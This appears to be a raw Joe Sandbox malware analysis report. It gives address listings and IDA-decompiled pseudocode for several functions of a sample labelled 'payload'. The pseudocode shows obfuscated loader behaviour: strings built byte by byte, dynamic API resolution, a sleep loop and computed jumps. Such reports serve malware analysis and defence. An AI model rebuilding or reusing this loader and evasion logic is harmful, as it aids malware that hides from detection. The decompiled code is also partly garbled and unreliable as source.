    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00402bd7
    0x00402bd9
    0x00402bdc
    0x00402be1
    0x00402be6
    0x00402beb
    0x00402bed
    0x00000000
    0x00000000
    0x00402bf3
    0x00402bf8
    0x00402bfd
    0x00402c03
    0x00402c08
    0x00402c0e
    0x00402c13
    0x00402c18
    0x00402c1d
    0x00402c1f
    0x00402c22
    0x00402c27
    0x00402c2c
    0x00402c31
    0x00402c34
    0x00000000
    0x00000000
    0x00402c40
    0x00402c41
    0x00401381
    0x00401381
    0x00401387
    0x0040138c
    0x0040138e
    0x00401391
    0x00401396
    0x004013a3
    0x00000000
    0x004013a9
    0x004013a9
    0x004013ae
    0x004013b3
    0x004013b5
    0x004013b8
    0x004013bd
    0x004013ca
    0x00000000
    0x004013d0
    0x004013d0
    0x004013d5
    0x004013da
    0x004013dc
    0x004013df
    0x004013e4
    0x004013f0
    0x00000000
    0x004013f6
    0x004013fc
    0x004013fd
    0x004013fd
    0x004013f0
    0x004013ca
    0x004013a3

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 004022EC, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 176synchronization
    C-Code - Quality: 44%
    			E004022EC() {
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t19;
				void* _t20;
				struct HINSTANCE__* _t23;
				void* _t24;
				void* _t25;
				long _t27;
				intOrPtr* _t29;
				intOrPtr _t30;
				void* _t35;
				signed int _t36;
				void* _t37;
				void* _t38;
				void* _t41;
				void* _t42;
				void* _t43;
				intOrPtr* _t45;
				void* _t49;
				void* _t53;
				void* _t55;
				intOrPtr* _t57;
				void* _t66;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push(1);
				 *_t57 =  *_t57 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t12) != 0) {
					L17:
					_push("zzdjjqpqaxlgt");
					_t14 = E00402E18(_t13);
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(E00402BB3(_t14) != 0) {
						L1:
						_push(1);
						 *_t57 =  *_t57 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t15 = E00401CAE(_t13); // executed
						if(_t15 != 0 || _t55 < 0xfd00) {
							L21:
							L22:
							goto L22;
						} else {
							 *0x305061 = 0x6b;
							 *0x00305062 = 0x65;
							 *0x00305063 = 0x72;
							 *0x00305064 = 0x6e;
							 *0x00305065 = 0x65;
							 *0x00305066 = 0x6c;
							 *0x00305067 = 0x33;
							_t19 = LoadLibraryA("kernel32.dll");
							 *0x40500e = _t19;
							_t45 = "pejpCreate";
							 *_t45 = 0x70616548;
							 *((short*)(_t45 + 4)) = 0x7243;
							 *((short*)(_t45 + 6)) = 0x6165;
							_push(_t45);
							_push(_t19);
							_push(__imp__LoadLibraryExW);
							_pop( *0x40500a);
							_push(_t19);
							_push(1);
							 *_t57 =  *_t57 - 1;
							_push("vwzhywkzcohliu");
							_push("oledcrpjmksdjf"); // executed
							_t20 = E00401CAE(_t19); // executed
							if(_t20 != 0) {
								goto L21;
							}
							L"oidsapi.dll" = 0x6e;
							M00405038 = 0x74;
							_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
							 *((intOrPtr*)(_t55 - 4)) = _t23;
							_push(_t23);
							if(_t23 == 0) {
								goto L21;
							}
							_push("zzdjjqpqaxlgt"); // executed
							_t24 = E00402E18(_t23); // executed
							_push("true");
							 *_t57 =  *_t57 - 1;
							_push(0x4050b3);
							_push("bkktdsxxkjueaz"); // executed
							_t25 = E00402BB3(_t24); // executed
							if(_t25 != 0) {
								goto L21;
							}
							_push(0x1e);
							do {
								_t27 = WaitForSingleObject(0xffffffff, 1); // executed
								 *_t57 =  *_t57 - 1;
							} while ( *_t57 != 0);
							_t57 = _t57 + 4;
							 *0x40501a = 0;
							_push("zzdjjqpqaxlgt"); // executed
							E00402E18(_t27); // executed
							_pop(_t49);
							 *_t57 =  *_t57 +  *((intOrPtr*)(_t49 + 0x3c));
							_t53 = _t49;
							 *0x405002 = _t53 + 0xa4;
							_t29 =  *0x405002;
							_t30 =  *_t29;
							 *0x405002 = _t30;
							_t66 =  *0x405002 - 0xfff;
							if(_t66 > 0) {
								goto L21;
							}
							asm("sbb dword [ecx], 0xa0");
							if(_t66 < 0) {
								goto L21;
							}
							 *0x405016 = GetProcAddress();
							LoadLibraryA("kernel32.dll");
							 *0x40501a = E004019C6;
							_push(E00402749);
							_pop(_t35);
							 *0x40501a =  *0x40501a + _t35;
							if( *((intOrPtr*)(_t55 - 4)) != 0xffffffff) {
								 *0x40501a =  *0x40501a - E00402749;
								_t36 =  *0x40501a; // 0x0
								goto __eax;
							}
							 *0x40501a =  *0x40501a ^ E004019C6;
							goto __eax;
						}
					}
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(_t13 != 0) {
						goto L1;
					}
					_push( *0x4050cf);
					_t41 = E00402AD0(_t13);
					_push( *0x4050cf);
					_t42 = E00402AD0(_t41);
					_push( *0x4050cf);
					_t43 = E00402AD0(_t42);
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(E00402BB3(_t43) != 0) {
						goto L1;
					}
					_push(E0040274E);
					return E0040274E;
				} else {
					_push("zzdjjqpqaxlgt");
					_t37 = E00402E18(_t36);
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(E00402BB3(_t37) != 0) {
						goto L17;
					} else {
						_push(1);
						 *_t57 =  *_t57 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf");
						if(_t13 != 0) {
							goto L17;
						} else {
							_push( *0x4050cf);
							_t38 = E00402AD0(_t13);
							_push(1);
							 *_t57 =  *_t57 - 1;
							_push("vwzhywkzcohliu");
							_push("oledcrpjmksdjf");
							if(E00401CAE(_t38) != 0) {
								goto L17;
							} else {
								_push(0x401e1e);
								return 0x401e1e;
							}
						}
					}
				}
			}




























    0x004022ec
    0x004022f1
    0x004022f6
    0x004022f8
    0x004022fb
    0x00402300
    0x0040230c
    0x004025f4
    0x004025f4
    0x004025f9
    0x004025fe
    0x00402600
    0x00402603
    0x00402608
    0x00402614
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x00401e4b
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401e34
    0x0040261a
    0x0040261c
    0x0040261f
    0x00402624
    0x00402631
    0x00000000
    0x00000000
    0x00402637
    0x0040263d
    0x00402642
    0x00402648
    0x0040264d
    0x00402653
    0x00402658
    0x0040265a
    0x0040265d
    0x00402662
    0x0040266f
    0x00000000
    0x00000000
    0x0040267b
    0x0040267c
    0x00402312
    0x00402312
    0x00402317
    0x0040231c
    0x0040231e
    0x00402321
    0x00402326
    0x00402333
    0x00000000
    0x00402339
    0x00402339
    0x0040233b
    0x0040233e
    0x00402343
    0x0040234f
    0x00000000
    0x00402355
    0x00402355
    0x0040235b
    0x00402360
    0x00402362
    0x00402365
    0x0040236a
    0x00402377
    0x00000000
    0x0040237d
    0x00402383
    0x00402384
    0x00402384
    0x00402377
    0x0040234f
    0x00402333

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401409, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 175synchronization
    C-Code - Quality: 48%
    			E00401409() {
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t14;
				struct HINSTANCE__* _t18;
				intOrPtr _t19;
				struct HINSTANCE__* _t22;
				void* _t23;
				intOrPtr _t24;
				long _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				void* _t34;
				void* _t37;
				void* _t39;
				void* _t40;
				intOrPtr* _t42;
				void* _t46;
				void* _t50;
				void* _t52;
				intOrPtr* _t54;

				_push(0xf);
				 *_t54 =  *_t54 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t11) != 0) {
					L5:
					_push(0xf);
					 *_t54 =  *_t54 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t13 = E00402BB3(_t12);
					__eflags = _t13;
					if(_t13 != 0) {
						L10:
						_push(1);
						 *_t54 =  *_t54 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t14 = E00401CAE(_t13); // executed
						__eflags = _t14;
						if(_t14 != 0) {
							L22:
							L23:
							goto L23;
						}
						__eflags = _t52 - 0xfd00;
						if(_t52 < 0xfd00) {
							goto L22;
						}
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t18 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t18;
						_t42 = "pejpCreate";
						 *_t42 = 0x70616548;
						 *((short*)(_t42 + 4)) = 0x7243;
						 *((short*)(_t42 + 6)) = 0x6165;
						_push(_t42);
						_push(_t18);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t18);
						_push(1);
						 *_t54 =  *_t54 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t19 = E00401CAE(_t18); // executed
						__eflags = _t19;
						if(_t19 != 0) {
							goto L22;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t52 - 4)) = _t22;
						_push(_t22);
						__eflags = _t22;
						if(_t22 == 0) {
							goto L22;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t23 = E00402E18(_t22); // executed
						_push("true");
						 *_t54 =  *_t54 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t24 = E00402BB3(_t23); // executed
						__eflags = _t24;
						if(_t24 != 0) {
							goto L22;
						}
						_push(0x1e);
						do {
							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t54 =  *_t54 - 1;
							__eflags =  *_t54;
						} while ( *_t54 != 0);
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t26); // executed
						_pop(_t46);
						 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t54 + 4)) +  *((intOrPtr*)(_t46 + 0x3c));
						_t50 = _t46;
						 *0x405002 = _t50 + 0xa4;
						_t28 =  *0x405002;
						_t29 =  *_t28;
						 *0x405002 = _t29;
						__eflags =  *0x405002 - 0xfff;
						if(__eflags > 0) {
							goto L22;
						}
						asm("sbb dword [ecx], 0xa0");
						if(__eflags < 0) {
							goto L22;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t34);
						 *0x40501a =  *0x40501a + _t34;
						__eflags =  *((intOrPtr*)(_t52 - 4)) - 0xffffffff;
						if( *((intOrPtr*)(_t52 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
					_push(0xf);
					 *_t54 =  *_t54 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t13 = E00402BB3(_t13);
					__eflags = _t13;
					if(_t13 != 0) {
						goto L10;
					}
					_push("zzdjjqpqaxlgt");
					_t37 = E00402E18(_t13);
					_push(1);
					 *_t54 =  *_t54 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					_t13 = E00401CAE(_t37);
					__eflags = _t13;
					if(_t13 != 0) {
						goto L10;
					}
					_push(1);
					 *_t54 =  *_t54 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					_t13 = E00401CAE(_t13);
					__eflags = _t13;
					if(_t13 != 0) {
						goto L10;
					}
					_push(E004015CA);
					return E004015CA;
				} else {
					_push(0xf);
					 *_t54 =  *_t54 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(_t12 != 0) {
						goto L5;
					} else {
						_push("zzdjjqpqaxlgt");
						_t39 = E00402E18(_t12);
						_push( *0x4050cf);
						_t40 = E00402AD0(_t39);
						_push(1);
						 *_t54 =  *_t54 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf");
						if(E00401CAE(_t40) != 0) {
							goto L5;
						} else {
							_push(0xf);
							 *_t54 =  *_t54 - 1;
							_push(0x4050b3);
							_push("bkktdsxxkjueaz");
							if(_t12 != 0) {
								goto L5;
							} else {
								_push(0x401e1e);
								return 0x401e1e;
							}
						}
					}
				}
			}























    0x00401409
    0x0040140b
    0x0040140e
    0x00401413
    0x00401420
    0x004018b2
    0x004018b2
    0x004018b4
    0x004018b7
    0x004018bc
    0x004018c1
    0x004018c6
    0x004018c8
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x004018ce
    0x004018d0
    0x004018d3
    0x004018d8
    0x004018dd
    0x004018e2
    0x004018e5
    0x00000000
    0x00000000
    0x004018eb
    0x004018f0
    0x004018f5
    0x004018f7
    0x004018fa
    0x004018ff
    0x00401904
    0x00401909
    0x0040190c
    0x00000000
    0x00000000
    0x00401912
    0x00401914
    0x00401917
    0x0040191c
    0x00401921
    0x00401926
    0x00401929
    0x00000000
    0x00000000
    0x00401935
    0x00401936
    0x00401426
    0x00401426
    0x00401428
    0x0040142b
    0x00401430
    0x0040143c
    0x00000000
    0x00401442
    0x00401442
    0x00401447
    0x0040144c
    0x00401452
    0x00401457
    0x00401459
    0x0040145c
    0x00401461
    0x0040146d
    0x00000000
    0x00401473
    0x00401473
    0x00401475
    0x00401478
    0x0040147d
    0x0040148a
    0x00000000
    0x00401490
    0x00401496
    0x00401497
    0x00401497
    0x0040148a
    0x0040146d
    0x0040143c

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00402AD7, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 174synchronization
    C-Code - Quality: 49%
    			_entry_(void* __eax) {
				intOrPtr _v8;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				struct HINSTANCE__* _t23;
				intOrPtr _t24;
				struct HINSTANCE__* _t27;
				void* _t28;
				intOrPtr _t29;
				long _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				void* _t39;
				void* _t42;
				intOrPtr* _t44;
				void* _t49;
				void* _t53;
				intOrPtr _t55;
				intOrPtr* _t56;
				intOrPtr* _t58;
				intOrPtr* _t59;

				_push(__eax);
				 *_t58 = _t55;
				_t56 = _t58;
				_push(4);
				_t59 = _t58 + 0xffffffa0;
				_push( *0x4050cf);
				_t12 = E00402AD0(__eax);
				_push("zzdjjqpqaxlgt"); // executed
				_t13 = E00402E18(_t12); // executed
				_push("zzdjjqpqaxlgt"); // executed
				_t14 = E00402E18(_t13); // executed
				_push("true");
				 *_t59 =  *_t59 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf"); // executed
				_t15 = E00401CAE(_t14); // executed
				if(_t15 != 0) {
					L1:
					_push( *0x4050cf);
					_t16 = E00402AD0(_t15);
					_push( *0x4050cf);
					_t17 = E00402AD0(_t16);
					_push(0xf);
					 *_t59 =  *_t59 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(E00402BB3(_t17) != 0) {
						L5:
						_push(1);
						 *_t59 =  *_t59 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t19 = E00401CAE(_t18); // executed
						__eflags = _t19;
						if(_t19 != 0) {
							L17:
							L18:
							goto L18;
						}
						__eflags = _t56 - 0xfd00;
						if(_t56 < 0xfd00) {
							goto L17;
						}
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t23 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t23;
						_t44 = "pejpCreate";
						 *_t44 = 0x70616548;
						 *((short*)(_t44 + 4)) = 0x7243;
						 *((short*)(_t44 + 6)) = 0x6165;
						_push(_t44);
						_push(_t23);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t23);
						_push(1);
						 *_t59 =  *_t59 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t24 = E00401CAE(_t23); // executed
						__eflags = _t24;
						if(_t24 != 0) {
							goto L17;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t27 = LoadLibraryExW( &((L"")[1]), 0, 0);
						_v8 = _t27;
						_push(_t27);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L17;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t28 = E00402E18(_t27); // executed
						_push("true");
						 *_t59 =  *_t59 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t29 = E00402BB3(_t28); // executed
						__eflags = _t29;
						if(_t29 != 0) {
							goto L17;
						}
						_push(0x1e);
						do {
							_t31 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t59 =  *_t59 - 1;
							__eflags =  *_t59;
						} while ( *_t59 != 0);
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t31); // executed
						_pop(_t49);
						 *((intOrPtr*)(_t59 + 4)) =  *((intOrPtr*)(_t59 + 4)) +  *((intOrPtr*)(_t49 + 0x3c));
						_t53 = _t49;
						 *0x405002 = _t53 + 0xa4;
						_t33 =  *0x405002;
						_t34 =  *_t33;
						 *0x405002 = _t34;
						__eflags =  *0x405002 - 0xfff;
						if(__eflags > 0) {
							goto L17;
						}
						asm("sbb dword [ecx], 0xa0");
						if(__eflags < 0) {
							goto L17;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t39);
						 *0x40501a =  *0x40501a + _t39;
						__eflags = _v8 - 0xffffffff;
						if(_v8 != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
					_push(1);
					 *_t59 =  *_t59 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					if(_t18 != 0) {
						goto L5;
					}
					_push("zzdjjqpqaxlgt");
					_t42 = E00402E18(_t18);
					_push(1);
					 *_t59 =  *_t59 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					if(E00401CAE(_t42) != 0) {
						goto L5;
					}
					_push(E0040123E);
					return E0040123E;
				} else {
					_push(1);
					 *__esp =  *__esp - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					__eax = E00401CAE(__eax); // executed
					__eflags = __eax;
					if(__eax != 0) {
						goto L1;
					} else {
						_push("zzdjjqpqaxlgt"); // executed
						__eax = E00402E18(__eax); // executed
						__eax = 0x401e1e;
						_push(0x401e1e);
						return 0x401e1e;
					}
				}
			}




























    0x00402ad7
    0x00402add
    0x00402ae0
    0x00402ae2
    0x00402ae4
    0x00402ae7
    0x00402aed
    0x00402af2
    0x00402af7
    0x00402afc
    0x00402b01
    0x00402b06
    0x00402b08
    0x00402b0b
    0x00402b10
    0x00402b15
    0x00402b1c
    0x004012d9
    0x004012d9
    0x004012df
    0x004012e4
    0x004012ea
    0x004012ef
    0x004012f1
    0x004012f4
    0x004012f9
    0x00401306
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x0040130c
    0x0040130e
    0x00401311
    0x00401316
    0x00401322
    0x00000000
    0x00000000
    0x00401328
    0x0040132d
    0x00401332
    0x00401334
    0x00401337
    0x0040133c
    0x00401348
    0x00000000
    0x00000000
    0x00401354
    0x00401355
    0x00402b22
    0x00402b22
    0x00402b24
    0x00402b27
    0x00402b2c
    0x00402b31
    0x00402b36
    0x00402b39
    0x00000000
    0x00402b3f
    0x00402b3f
    0x00402b44
    0x00402b49
    0x00402b4f
    0x00402b50
    0x00402b50
    0x00402b39

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 004020F1, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 174synchronization
    C-Code - Quality: 44%
    			E004020F1(signed int __eax) {
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t17;
				struct HINSTANCE__* _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				void* _t26;
				void* _t27;
				long _t29;
				intOrPtr* _t31;
				intOrPtr _t32;
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t43;
				intOrPtr* _t45;
				void* _t49;
				void* _t53;
				void* _t55;
				intOrPtr* _t57;
				void* _t66;

				_t13 = E00402AD0(__eax ^ 0x004050cf);
				_push("zzdjjqpqaxlgt");
				_t14 = E00402E18(_t13);
				_push(0xf);
				 *_t57 =  *_t57 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				if(E00402BB3(_t14) != 0) {
					L18:
					_push("zzdjjqpqaxlgt");
					_t16 = E00402E18(_t15);
					_push(0xf);
					 *_t57 =  *_t57 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(E00402BB3(_t16) != 0) {
						L1:
						_push(1);
						 *_t57 =  *_t57 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t17 = E00401CAE(_t15); // executed
						if(_t17 != 0 || _t55 < 0xfd00) {
							L16:
							L17:
